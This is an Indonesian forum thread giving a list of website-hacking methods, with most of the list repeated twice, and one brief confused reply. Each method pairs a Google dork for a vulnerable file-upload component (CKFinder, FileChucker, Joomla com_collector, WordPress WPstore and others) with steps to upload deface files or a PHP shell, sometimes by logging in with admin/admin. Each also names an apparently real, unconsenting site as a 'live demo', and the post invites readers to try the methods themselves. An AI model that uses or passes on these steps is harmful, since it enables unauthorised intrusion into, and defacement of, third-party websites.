kumpulan cara untuk hack website
2 posters
Halaman 1 dari 1
kumpulan cara untuk hack website
silahkan praktekkan sendiri .
1. phUploader exploit
dork : "Powered by phUploader intext:txt" < bisa diganti sesuai kebutuhan
upload your own file : txt
akses file : akan ada preview setelah upload
live demo : http://www.bizarremart.com/pix/pix.php
2. Moxiecode File Browser
dork : intitle:Moxiecode File browser filetype:php
upload your own file : .html , .txt , .jpg
akses file : setelah upload , cari filemu , klik centang dan klik view di sebelah kanan
live demo : http://www.infol.com/Scripts/tiny_mce/plugins/filemanager/frameset.php
3. Ajax File manager upload vulnerabillity
dork : inurl:ajaxfilemanager.php intitle:ajax file manager
upload your own file : .txt , .jpg [upload form : http://prntscr.com/1jiwgh]
akses file : arahkan kursor ke file kalian dan kalian akan lihat akses file kalian di pojok bawah [http://prntscr.com/1jiwq7]
live demo : http://www.phungvinhhung.com/app/webroot/plugins/ajaxfilemanager/ajaxfilemanager.php
4. Exploit FileChucker
dork : inurl:/cgi-bin/filechucker.cgi
intext:File Upload by Encodable
upload your own file : .html , .txt , .jpg
akses file : isi semua data , kmudian upload , setelah itu klik saja file yang sudah diupload , itu preview file kamu
live demo : http://www.middadmit.org/cgi-bin/filechucker.cgi
5. (1.Masukkan dork ini ke kotak pencarian google inurl:/wp-content/themes /WPstore/ atau intext:"You have 0($0) item in your Shopping Bag"
2. Pilih salah satu dari hasil penelusuran
3.CTRL+U Cari Expolit Yang Kaya Gini http://prntscr.com/1d34wuwp-content/themes/[Path]/style.css
4. ganti style.css dengan upload
5. nanti akan muncul form buat upload contoh :http://prntscr.com/1d355q
6. upload shell anda
7. cara memanggilnya bagaimana mas? untuk cara memanggil shellnya /wp-content/uploads/products_img/shell.php
8. tinggal hajar index.php dengan script kamu)
6. FckLinkGallery upload vulnerability
Dork : inurl:Fck/fcklinkgallery.aspx
/portals/0/inurl:tabid/176/Default.aspx
Upload your own file : .txt , .jpg
Akses file : klik file , kemudian copykan javascript:__doPostBack('ctlURL$cmdUpload','') di browser , ntar bakalan muncul tombol upload , upload filemu , dan jika ingin preview filemu tambahkan /portals/0/ , jadihttp://site.com/portals/0/[yourfile].txt
live demo : http://www.iiit.org/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
7. KindEditor File Upload VulnerabilityDork : inurl:examples/uploadbutton.htmlUpload your file : .html , .txt , .jpgAkses file : setelah upload akan ada URL yang muncul , copykan itu dibelakang web jadi www.site.com/[URLdisini]live demo : http://staic.qefeng.com/Kindeditor/examples/uploadbutton.html
8. IMCE Drupal Upload VulnerabilityDork : inurl:"/imce?dir=" intitle:"File Browser"Upload your file : .htm , .html , .txt , .jpgAkses file : klik menu upload di pojok kiri atas setelah itu untuk view file : http://www.target.com/sites/default/[yourfilename].htmllive demo : http://www.simoneye.com/imce?dir=fashion_eyewear/engine1
9. XSS alias Cross Site ScriptingDork : inurl:"/showcatrows.php?CategoryID="How to deface : masukan kode berikut dibelakang url target : http://tny.cz/2a6cf72c < klik link , kode ada disanaNB : Untuk yang TsuNaomi48 bisa diganti dengan nickname kalian sendiri
Live demo : http://www.ebook-gigant.com/showcatrows.php?CategoryID=2
10. Exploit Shop737
Dork : "Powered by Shop737"
Upload your file : .txt , jpg
How to deface : setelah dapat web target , masukkan exploit berikut : /poto/upload.php , jadi URL menjadiwww.site.com/poto/upload.php , jika disuruh memasukkan username dan password , masukkan username : admin dan password : admin , setelah itu pilih kategori [ http://prntscr.com/1niiku] dan terakhir klik upload
Akses File : www.site.com/poto/[kategori yang kamu pilih tadi]/[nama filemu].txt
Live demo : www.hunnyhostel.com/poto/index.php
11. CKFinder Upload Vulnerabillity
Dork : inurl:CKfinder/ckfinder.html
Upload your file : .txt , .jpg
How to deface : setelah dapat web target , klik tombol upload di pojok kiri atas , kemudian upload file anda
Akses file : klik kanan pada file anda dan klik "View" , itulah akses file anda
Live Demo : http://famiana-resort.com/public/replace/ckfinder/ckfinder.html
12. Asset Manager Upload Vulnerability
Dork : "assetmanager/assetmanager.php" intitle:asset manager
Upload your file : .txt , .jpg
How to deface : setelah dapat web target , klik tombol choose file kemudian pilih file deface kamu dan klik tombol upload , jika berhasil akan ada preview disebelah kiri
NB : Jika tidak ada preview file , ubah filter ke all files [https://2img.net/h/s14.postimg.cc/5yl6ejs35/ssssssssssssssss.jpg]
Akses file : klik pada file anda , akan ada hasil view dari file anda tadi [https://2img.net/h/s14.postimg.cc/a8zua4x69/uuuu.jpg] dan copykan url itu ke adress bar anda , sehingga menjadi site.com/[url]
Live demo : http://www.andyrouse.co.uk/assetmanager/assetmanager.php
13 . Deface Dengan Joomla com_collecter shell upload ^_^# Download: http://www.steevo.fr/en/download
# dork: [inurl.php?option=com_collector]
# masukan exploit ini index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1# Jadi Seperti ini >> : http://www.sitetarget.com/index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1 :v
# langsung upload shellnya di bawah kanan
# Kalo nyari shell yg udah di upload gmn ? : http://www.sitetargetganteng.com/shell.php
14. Com_Guestbook -_-
Ini cuma bisa add post ajaTapi setidaknya ntar link post bisa disubmit
Dork :inurl:"index.php?option=com_guestbook"
1. phUploader exploit
dork : "Powered by phUploader intext:txt" < bisa diganti sesuai kebutuhan
upload your own file : txt
akses file : akan ada preview setelah upload
live demo : http://www.bizarremart.com/pix/pix.php
2. Moxiecode File Browser
dork : intitle:Moxiecode File browser filetype:php
upload your own file : .html , .txt , .jpg
akses file : setelah upload , cari filemu , klik centang dan klik view di sebelah kanan
live demo : http://www.infol.com/Scripts/tiny_mce/plugins/filemanager/frameset.php
3. Ajax File manager upload vulnerabillity
dork : inurl:ajaxfilemanager.php intitle:ajax file manager
upload your own file : .txt , .jpg [upload form : http://prntscr.com/1jiwgh]
akses file : arahkan kursor ke file kalian dan kalian akan lihat akses file kalian di pojok bawah [http://prntscr.com/1jiwq7]
live demo : http://www.phungvinhhung.com/app/webroot/plugins/ajaxfilemanager/ajaxfilemanager.php
4. Exploit FileChucker
dork : inurl:/cgi-bin/filechucker.cgi
intext:File Upload by Encodable
upload your own file : .html , .txt , .jpg
akses file : isi semua data , kmudian upload , setelah itu klik saja file yang sudah diupload , itu preview file kamu
live demo : http://www.middadmit.org/cgi-bin/filechucker.cgi
5. (1.Masukkan dork ini ke kotak pencarian google inurl:/wp-content/themes /WPstore/ atau intext:"You have 0($0) item in your Shopping Bag"
2. Pilih salah satu dari hasil penelusuran
3.CTRL+U Cari Expolit Yang Kaya Gini http://prntscr.com/1d34wuwp-content/themes/[Path]/style.css
4. ganti style.css dengan upload
5. nanti akan muncul form buat upload contoh :http://prntscr.com/1d355q
6. upload shell anda
7. cara memanggilnya bagaimana mas? untuk cara memanggil shellnya /wp-content/uploads/products_img/shell.php
8. tinggal hajar index.php dengan script kamu)
6. FckLinkGallery upload vulnerability
Dork : inurl:Fck/fcklinkgallery.aspx
/portals/0/inurl:tabid/176/Default.aspx
Upload your own file : .txt , .jpg
Akses file : klik file , kemudian copykan javascript:__doPostBack('ctlURL$cmdUpload','') di browser , ntar bakalan muncul tombol upload , upload filemu , dan jika ingin preview filemu tambahkan /portals/0/ , jadihttp://site.com/portals/0/[yourfile].txt
live demo : http://www.iiit.org/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
7. KindEditor File Upload VulnerabilityDork : inurl:examples/uploadbutton.htmlUpload your file : .html , .txt , .jpgAkses file : setelah upload akan ada URL yang muncul , copykan itu dibelakang web jadi www.site.com/[URLdisini]live demo : http://staic.qefeng.com/Kindeditor/examples/uploadbutton.html
8. IMCE Drupal Upload VulnerabilityDork : inurl:"/imce?dir=" intitle:"File Browser"Upload your file : .htm , .html , .txt , .jpgAkses file : klik menu upload di pojok kiri atas setelah itu untuk view file : http://www.target.com/sites/default/[yourfilename].htmllive demo : http://www.simoneye.com/imce?dir=fashion_eyewear/engine1
9. XSS alias Cross Site ScriptingDork : inurl:"/showcatrows.php?CategoryID="How to deface : masukan kode berikut dibelakang url target : http://tny.cz/2a6cf72c < klik link , kode ada disanaNB : Untuk yang TsuNaomi48 bisa diganti dengan nickname kalian sendiri
Live demo : http://www.ebook-gigant.com/showcatrows.php?CategoryID=2
10. Exploit Shop737
Dork : "Powered by Shop737"
Upload your file : .txt , jpg
How to deface : setelah dapat web target , masukkan exploit berikut : /poto/upload.php , jadi URL menjadiwww.site.com/poto/upload.php , jika disuruh memasukkan username dan password , masukkan username : admin dan password : admin , setelah itu pilih kategori [ http://prntscr.com/1niiku] dan terakhir klik upload
Akses File : www.site.com/poto/[kategori yang kamu pilih tadi]/[nama filemu].txt
Live demo : www.hunnyhostel.com/poto/index.php
11. CKFinder Upload Vulnerabillity
Dork : inurl:CKfinder/ckfinder.html
Upload your file : .txt , .jpg
How to deface : setelah dapat web target , klik tombol upload di pojok kiri atas , kemudian upload file anda
Akses file : klik kanan pada file anda dan klik "View" , itulah akses file anda
Live Demo : http://famiana-resort.com/public/replace/ckfinder/ckfinder.html
12. Asset Manager Upload Vulnerability
Dork : "assetmanager/assetmanager.php" intitle:asset manager
Upload your file : .txt , .jpg
How to deface : setelah dapat web target , klik tombol choose file kemudian pilih file deface kamu dan klik tombol upload , jika berhasil akan ada preview disebelah kiri
NB : Jika tidak ada preview file , ubah filter ke all files [https://2img.net/h/s14.postimg.cc/5yl6ejs35/ssssssssssssssss.jpg]
Akses file : klik pada file anda , akan ada hasil view dari file anda tadi [https://2img.net/h/s14.postimg.cc/a8zua4x69/uuuu.jpg] dan copykan url itu ke adress bar anda , sehingga menjadi site.com/[url]
Live demo : http://www.andyrouse.co.uk/assetmanager/assetmanager.php
13 . Deface Dengan Joomla com_collecter shell upload ^_^# Download: http://www.steevo.fr/en/download
# dork: [inurl.php?option=com_collector]
# masukan exploit ini index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1# Jadi Seperti ini >> : http://www.sitetarget.com/index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1 :v
# langsung upload shellnya di bawah kanan
# Kalo nyari shell yg udah di upload gmn ? : http://www.sitetargetganteng.com/shell.php
14. Com_Guestbook -_-
Ini cuma bisa add post ajaTapi setidaknya ntar link post bisa disubmit
Dork :inurl:"index.php?option=com_guestbook"
Re: kumpulan cara untuk hack website
kok sya bingung :3
stygianblaze- Jumlah posting : 4
Join date : 08.04.14
Halaman 1 dari 1
Permissions in this forum:
Anda tidak dapat menjawab topik